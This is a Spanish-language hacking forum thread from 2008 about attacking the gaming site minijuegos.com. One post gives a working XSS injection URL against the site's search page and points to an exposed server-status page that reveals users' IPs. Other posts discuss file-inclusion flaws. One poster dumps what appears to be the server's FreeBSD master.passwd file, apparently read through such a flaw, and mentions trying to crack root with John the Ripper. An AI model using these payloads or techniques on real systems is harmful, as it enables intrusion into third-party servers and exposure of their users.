[°] Todas las IPs de los usuarios online de Minijuegos

Iniciado por dimitrix, 18 Mayo 2008, 16:29 PM

0 Miembros y 1 Visitante están viendo este tema.

c1c4tr1z

#20
Perdon si esta mal "posteado", pero aca hay una vulnerabilidad sobre XSS o HTMLi en minijuegos.com:

http://www.minijuegos.com/busqueda.php?nov=0&termino=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%3C/h1%3E%3C/marquee%3E

UPDATE: Y despues dejaron intensionalmente (creo ;D) server-status habilitado:

http://www.minijuegos.com/server-status

Lo que nos permitiria ver en tiempo real a los usuarios conectados, path del servidor, la accion que toma el usuario remoto, etc.

Y en minitoneos.com, por el input de usuario [metodo POST]:

http://www.minitorneos.com/registro/

Saludos!



dimitrix

Es como un RFI (Remote File Include) pero con archivos locales de su cuenta.




Rozor

pues eso LFI ( Local File Include/Inclusion ).
o RFI ( Remote File Include/Inclusion ).

¿Tan dificil es? xDDDDDDD

¿no es realmente humillante para ti lo que escribes?
out in the streets they call it murder....

chrominum


berz3k

Muy curioso, un FreeBSD, kernel vulnerable y el john aun no entrega pass de root XDDD

PASSWORDS


# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
ftp:*:21:14:FTP owner:/nonexistent:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
admin:*:1001:0:Admin User:/home/admin:/bin/tcsh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
pdns_recursor:*:120:120:pdns_recursor pseudo-user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
user3:*:1002:1002:User &:/home/user3:/bin/tcsh


-berz3k.